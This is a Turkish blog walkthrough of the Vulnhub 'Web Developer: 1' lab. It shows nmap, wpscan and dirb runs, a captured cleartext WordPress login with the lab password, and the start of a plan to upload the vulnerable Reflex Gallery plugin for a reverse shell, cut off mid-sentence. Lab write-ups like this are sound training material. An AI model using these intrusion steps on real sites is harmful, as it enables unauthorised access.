{"id":1231,"date":"2021-06-22T22:22:56","date_gmt":"2021-06-22T22:22:56","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1231"},"modified":"2021-06-22T22:22:56","modified_gmt":"2021-06-22T22:22:56","slug":"web-developer-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/22\/web-developer-1\/","title":{"rendered":"WEB DEVELOPER: 1"},"content":{"rendered":"<h2>Makine Hakk\u0131nda Bilgiler<\/h2>\n<p><strong>A\u00e7\u0131klama:<\/strong><br \/>\nA machine using the newest REMOVED Server, the newest REMOVED and containing some REMOVED....<\/p>\n<p><strong>Vulnhub Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/web-developer-1,288\/\">https:\/\/www.vulnhub.com\/entry\/web-developer-1,288\/<\/a><\/p>\n<p><strong>\u0130ndirme Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/webdeveloper\/WebDeveloper.ova\">https:\/\/download.vulnhub.com\/webdeveloper\/WebDeveloper.ova<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# arp-scan -l | grep 54:c9\n192.168.31.147  08:00:27:cc:54:c9   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.31.130  netmask 255.255.255.0  broadcast 192.168.31.255\n        inet6 fe80::a00:27ff:fe0e:348d  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:0e:34:8d  txqueuelen 1000  (Ethernet)\n        RX packets 42100  bytes 63008084 (60.0 MiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 17094  bytes 1165859 (1.1 MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n<p>nmmap taramas\u0131 ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# nmap -p- -A -T4 192.168.31.147\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-22 14:39 EDT\nNmap scan report for 192.168.31.147\nHost is up (0.00073s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)\n|   256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)\n|_  256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-generator: WordPress 4.9.8\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n|_http-title: Example site &amp;#8211; Just another WordPress site\nMAC Address: 08:00:27:CC:54:C9 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.73 ms 192.168.31.147\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.63 seconds\n<\/code><\/pre>\n<p>ssh ve http... Nikto ile kontrol ederken dirb taramas\u0131 ba\u015flatt\u0131m ve makinenin wordpress oldu\u011funu anlad\u0131m. wp-scan ile bir kullan\u0131c\u0131 tespit ettim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# wpscan --url http:\/\/192.168.31.147 -e vp,vt,tt,u,m --api-token ****************************                                                                                                                            5 \u2a2f\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.17\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.31.147\/ [192.168.31.147]\n[+] Started: Tue Jun 22 15:37:15 2021\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.29 (Ubuntu)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.31.147\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.31.147\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.31.147\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.31.147\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/192.168.31.147\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n |  - http:\/\/192.168.31.147\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=4.9.8&lt;\/generator&gt;\n |\n | [!] 27 vulnerabilities identified:\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated File Delete\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/e3ef8976-11cb-4854-837f-786f43cbdf44\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20147\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated Post Type Bypass\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/999dba5a-82fb-4717-89c3-6ed723cc7e45\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20152\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/blog.ripstech.com\/2018\/wordpress-post-type-privilege-escalation\/\n |\n | [!] Title: WordPress &lt;= 5.0 - PHP Object Injection via Meta Data\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/046ff6a0-90b2-4251-98fc-b7fba93f8334\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20148\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Authenticated Cross-Site Scripting (XSS)\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3182002e-d831-4412-a27d-a5e39bb44314\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20153\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - Cross-Site Scripting (XSS) that could affect plugins\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7f7a0795-4dd7-417d-804e-54f12595d1e4\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20150\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460\n |\n | [!] Title: WordPress &lt;= 5.0 - User Activation Screen Search Engine Indexing\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/65f1aec4-6d28-4396-88d7-66702b21c7a2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20151\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |\n | [!] Title: WordPress &lt;= 5.0 - File Upload to XSS on Apache Web Servers\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d741f5ae-52ca-417d-a2ca-acdfb7ca5808\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-20149\n |      - https:\/\/wordpress.org\/news\/2018\/12\/wordpress-5-0-1-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/246a70bdbfac3bd45ff71c7941deef1bb206b19a\n |\n | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution\n |     Fixed in: 4.9.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/1a693e57-f99c-4df6-93dd-0cdc92fd0526\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8942\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-8943\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-image-remote-code-execution\/\n |      - https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/wp_crop_rce\n |\n | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)\n |     Fixed in: 4.9.10\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d150f43f-6030-4191-98b8-20ae05585936\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-9787\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/0292de60ec78c5a44956765189403654fe4d080b\n |      - https:\/\/wordpress.org\/news\/2019\/03\/wordpress-5-1-1-security-and-maintenance-release\/\n |      - https:\/\/blog.ripstech.com\/2019\/wordpress-csrf-to-rce\/\n |\n | [!] Title: WordPress &lt;= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation\n |     Fixed in: 4.9.11\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4494a903-5a73-4cad-8c14-1e7b4da2be61\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16222\n |      - https:\/\/wordpress.org\/news\/2019\/09\/wordpress-5-2-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/30ac67579559fe42251b5a9f887211bf61a8ed68\n |      - https:\/\/hackerone.com\/reports\/339483\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Stored XSS in Customizer\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d39a7b84-28b9-4916-a2fc-6192ceb6fa56\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17674\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Unauthenticated View Private\/Draft Posts\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17671\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/f82ed753cf00329a5e41f2cb6dc521085136f308\n |      - https:\/\/0day.work\/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts\/\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Stored XSS in Style Tags\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d005b1f8-749d-438a-8818-21fba45c6465\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17672\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - JSON Request Cache Poisoning\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7804d8ed-457a-407e-83a7-345d3bbe07b2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17673\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/b224c251adfa16a5f84074a3c0886270c9df38de\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation \n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/26a26de2-d598-405d-b00c-61f71cfacff6\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17669\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17670\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/9db44754b9e4044690a6c32fd74b9d5fe26b07b2\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Admin Referrer Validation\n |     Fixed in: 4.9.12\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/715c00e3-5302-44ad-b914-131c162c3f71\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17675\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Improper Access Controls in REST API\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4a6de154-5fbd-4c80-acd3-8902ee431bd8\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-20043\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16788\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-g7rg-hchx-c2gw\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Stored XSS via Crafted Links\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/23553517-34e3-40a9-a406-f3ffbe9dd265\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16773\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/hackerone.com\/reports\/509930\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-xvg2-m2f4-83m7\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Stored XSS via Block Editor Content\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/be794159-4486-4ae1-a5cc-5c190e5ddf5f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16781\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16780\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-pg4x-64rh-3c9v\n |\n | [!] Title: WordPress &lt;= 5.3 - wp_kses_bad_protocol() Colon Bypass\n |     Fixed in: 4.9.13\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-20041\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/b1975463dd995da19bb40d3fa0786498717e3c53\n |\n | [!] Title: WordPress &lt; 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7db191c0-d112-4f08-a419-a1cd81928c4e\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11027\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47634\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-ww7v-jg8c-q6jw\n |\n | [!] Title: WordPress &lt; 5.4.1 - Unauthenticated Users View Private Posts\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d1e1ba25-98c9-4ae7-8027-9632fb825a56\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11028\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47635\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-xhx9-759f-6p2w\n |\n | [!] Title: WordPress &lt; 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4eee26bd-a27e-4509-a3a5-8019dd48e429\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11025\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47633\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-4mhg-j6fx-5g3c\n |\n | [!] Title: WordPress &lt; 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/e721d8b9-a38f-44ac-8520-b4a9ed6a5157\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11029\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47637\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-568w-8m88-8g2c\n |\n | [!] Title: WordPress &lt; 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads\n |     Fixed in: 4.9.14\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/55438b63-5fc9-4812-afc4-2f1eff800d5f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11026\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47638\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-3gw2-4656-pfr2\n |      - https:\/\/hackerone.com\/reports\/179695\n |\n | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure\n |     Fixed in: 4.9.17\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/6a3ec618-c79e-4b9c-9020-86b157458ac5\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29450\n |      - https:\/\/wordpress.org\/news\/2021\/04\/wordpress-5-7-1-security-and-maintenance-release\/\n |      - https:\/\/blog.wpscan.com\/2021\/04\/15\/wordpress-571-security-vulnerability-release.html\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-pmmh-2f36-wvhq\n |      - https:\/\/core.trac.wordpress.org\/changeset\/50717\/\n |      - https:\/\/www.youtube.com\/watch?v=J2GXmxAdNWs\n |\n | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer\n |     Fixed in: 4.9.18\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4cd46653-4470-40ff-8aac-318bee2f998d\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-36326\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-19296\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/267061c9595fedd321582d14c21ec9e7da2dcf62\n |      - https:\/\/wordpress.org\/news\/2021\/05\/wordpress-5-7-2-security-release\/\n |      - https:\/\/github.com\/PHPMailer\/PHPMailer\/commit\/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9\n |      - https:\/\/www.wordfence.com\/blog\/2021\/05\/wordpress-5-7-2-security-release-what-you-need-to-know\/\n |      - https:\/\/www.youtube.com\/watch?v=HaW15aMzBUM\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2021-04-27T00:00:00.000Z\n | Readme: http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 2.7\n | Style URL: http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 1.7 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/192.168.31.147\/wp-content\/themes\/twentyseventeen\/style.css?ver=4.9.8, Match: &#039;Version: 1.7&#039;\n\n[+] Enumerating Vulnerable Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:00:00 &lt;==============================================================================================================================================================&gt; (352 \/ 352) 100.00% Time: 00:00:00\n[+] Checking Theme Versions (via Passive and Aggressive Methods)\n\n[i] No themes Found.\n\n[+] Enumerating Timthumbs (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:00:01 &lt;============================================================================================================================================================&gt; (2575 \/ 2575) 100.00% Time: 00:00:01\n\n[i] No Timthumbs Found.\n\n[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to &quot;Plain&quot; for those to be detected)\n Brute Forcing Attachment IDs - Time: 00:00:00 &lt;==========================================================================================================================================================&gt; (100 \/ 100) 100.00% Time: 00:00:00\n\n[i] No Medias Found.\n\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:00 &lt;================================================================================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:00\n\n[i] User(s) Identified:\n\n[+] webdeveloper\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/192.168.31.147\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 19\n\n[+] Finished: Tue Jun 22 15:37:21 2021\n[+] Requests Done: 3090\n[+] Cached Requests: 10\n[+] Data Sent: 863.479 KB\n[+] Data Received: 950.471 KB\n[+] Memory used: 285.465 MB\n[+] Elapsed time: 00:00:06\n<\/code><\/pre>\n<p>hydra ile k\u0131rmay\u0131 denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m. dirb \u00e7\u0131kt\u0131s\u0131nda ilgin bir link vard\u0131...<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# dirb http:\/\/192.168.31.147 \n\n-----------------\nDIRB v2.22    \nBy The Dark Raver\n-----------------\n\nSTART_TIME: Tue Jun 22 15:15:10 2021\nURL_BASE: http:\/\/192.168.31.147\/\nWORDLIST_FILES: \/usr\/share\/dirb\/wordlists\/common.txt\n\n-----------------\n\nGENERATED WORDS: 4612                                                          \n\n---- Scanning URL: http:\/\/192.168.31.147\/ ----\n+ http:\/\/192.168.31.147\/index.php (CODE:301|SIZE:0)                                                                                                                                                                                          \n==&gt; DIRECTORY: http:\/\/192.168.31.147\/ipdata\/      <\/code><\/pre>\n<p><strong><a href=\"http:\/\/192.168.31.147\/ipdata\/\">http:\/\/192.168.31.147\/ipdata\/<\/a><\/strong> klas\u00f6r\u00fc alt\u0131nda bir pcap dosyas\u0131 buunuyor ve a\u00e7\u0131k metin halinde wordpress'e giri\u015f yap\u0131l\u0131rken kullan\u0131c\u0131 bilgileri g\u00f6z\u00fck\u00fcyor. Buradan wordpress kullan\u0131c\u0131 \u015fifresini tespit ettim. \u0130lgili paketin stream edilmi\u015f hali a\u015fa\u011f\u0131dad\u0131r.<\/p>\n<pre><code class=\"language-sh\">POST \/wordpress\/wp-login.php HTTP\/1.1\nHost: 192.168.1.176\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http:\/\/192.168.1.176\/wordpress\/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.176%2Fwordpress%2Fwp-admin%2F&amp;reauth=1\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 152\nCookie: wordpress_test_cookie=WP+Cookie+check\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\nlog=webdeveloper&amp;pwd=Te5eQg%264sBS%21Yr%24%29wf%25%28DcAd&amp;wp-submit=Log+In&amp;redirect_to=http%3A%2F%2F192.168.1.176%2Fwordpress%2Fwp-admin%2F&amp;testcookie=1<\/code><\/pre>\n<p>Bunun \u00fczerine wordpress'e giri\u015f yapt\u0131m. Direkt olarak edit\u00f6rden reverse almay\u0131 denedim. Ancak dosyalar\u0131 de\u011fi\u015ftirme yetkim yoktu. B\u00f6yle olunca zafiyetli bir plugin y\u00fckleme karar\u0131 verdim. Burada yard\u0131m\u0131ma <strong>Reflex Gallery 3.1.3<\/strong> yeti\u015fti. <a href=\"https:\/\/www.exploit-db.com\/exploits\/36374\">https:\/\/www.exploit-db.com\/exploits\/36374<\/a> sayfas\u0131ndan ilk ba\u015fta zafiyetli plugini indirdim ve 